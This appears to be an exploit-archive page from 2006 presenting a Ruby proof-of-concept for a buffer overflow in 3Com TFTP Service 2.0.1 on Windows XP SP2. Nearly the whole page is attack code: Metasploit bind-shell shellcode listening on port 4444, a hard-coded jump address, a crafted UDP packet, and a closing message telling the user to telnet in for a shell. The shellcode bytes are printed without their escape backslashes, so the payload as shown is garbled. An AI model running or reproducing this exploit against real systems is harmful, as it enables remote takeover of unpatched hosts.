3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
# Published : 2006-11-30
# Author : cthulhu
# Previous Title : AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
# Next Title : Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit

# 3comtftpd_xpsp2.rb 
# 
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the  3Com TFTP Service version 2.0.1 
# long transporting mode buffer overflow under xp sp2 english 
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified

require 'socket'

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

sc1 = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x02"
sc1 += "xafxbbx16x83xebxfcxe2xf4xfexc5x50x5bxeax56x44xe9"
sc1 +="xfdxcfx30x7ax26x8bx30x53x3ex24xc7x13x7axaex54x9d"
sc1 +="x4dxb7x30x49x22xaex50x5fx89x9bx30x17xecx9ex7bx8f"
sc1 +="xaex2bx7bx62x05x6ex71x1bx03x6dx50xe2x39xfbx9fx3e"
sc1 +="x77x4ax30x49x26xaex50x70x89xa3xf0x9dx5dxb3xbaxfd"
sc1 +="x01x83x30x9fx6ex8bxa7x77xc1x9ex60x72x89xecx8bx9d"
sc1 +="x42xa3x30x66x1ex02x30x56x0axf1xd3x98x4cxa1x57x46"
sc1 +="xfdx79xddx45x64xc7x88x24x6axd8xc8x24x5dxfbx44xc6"
sc1 +="x6ax64x56xeax39xffx44xc0x5dx26x5ex70x83x42xb3x14"
sc1 +="x57xc5xb9xe9xd2xc7x62x1fxf7x02xecxe9xd4xfcxe8x45"
sc1 +="x51xfcxf8x45x41xfcx44xc6x64xc7xaax4ax64xfcx32xf7"
sc1 +="x97xc7x1fx0cx72x68xecxe9xd4xc5xabx47x57x50x6bx7e"
sc1 +="xa6x02x95xffx55x50x6dx45x57x50x6bx7exe7xe6x3dx5f"
sc1 +="x55x50x6dx46x56xfbxeexe9xd2x3cxd3xf1x7bx69xc2x41"
sc1 +="xfdx79xeexe9xd2xc9xd1x72x64xc7xd8x7bx8bx4axd1x46"
sc1 +="x5bx86x77x9fxe5xc5xffx9fxe0x9ex7bxe5xa8x51xf9x3b"
sc1 +="xfcxedx97x85x8fxd5x83xbdxa9x04xd3x64xfcx1cxadxe9"
sc1 +="x77xebx44xc0x59xf8xe9x47x53xfexd1x17x53xfexeex47"
sc1 +="xfdx7fxd3xbbxdbxaax75x45xfdx79xd1xe9xfdx98x44xc6"
sc1 +="x89xf8x47x95xc6xcbx44xc0x50x50x6bx7exf2x25xbfx49"
sc1 +="x51x50x6dxe9xd2xafxbbx16"

jmp = "x63x20xdcx77" # jmp esi user32.dll xp sp 2 english

host = ARGV[0]
port = 69

if ARGV[1]
	port = ARGV[1]
end

sock = UDPSocket.new()

puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
	raise "Unable to connect to #{host}"
end

exploit  = "x00x02"
exploit += "a"
exploit += "x00"
exploit += "x90"* 129 
exploit += sc1 
exploit += jmp
exploit += "x00"

puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0

puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"

# www.Syue.com [2006-11-30]